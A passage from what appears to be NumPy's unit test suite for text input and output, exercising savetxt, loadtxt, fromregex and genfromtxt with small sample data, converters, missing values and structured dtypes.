asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
class TestLoadTxt(TestCase):
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=np.int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, b'1 21\r3 42\r')
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
def test_bad_line(self):
c = TextIO()
c.write('1 2 3\n4 5 6\n2 3')
c.seek(0)
# Check for exception and that exception contains line number
assert_raises_regex(ValueError, "3", np.loadtxt, c)
class Testfromregex(TestCase):
# np.fromregex expects files opened in binary mode.
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = TextIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
"Test retrieving a header"
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C': lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
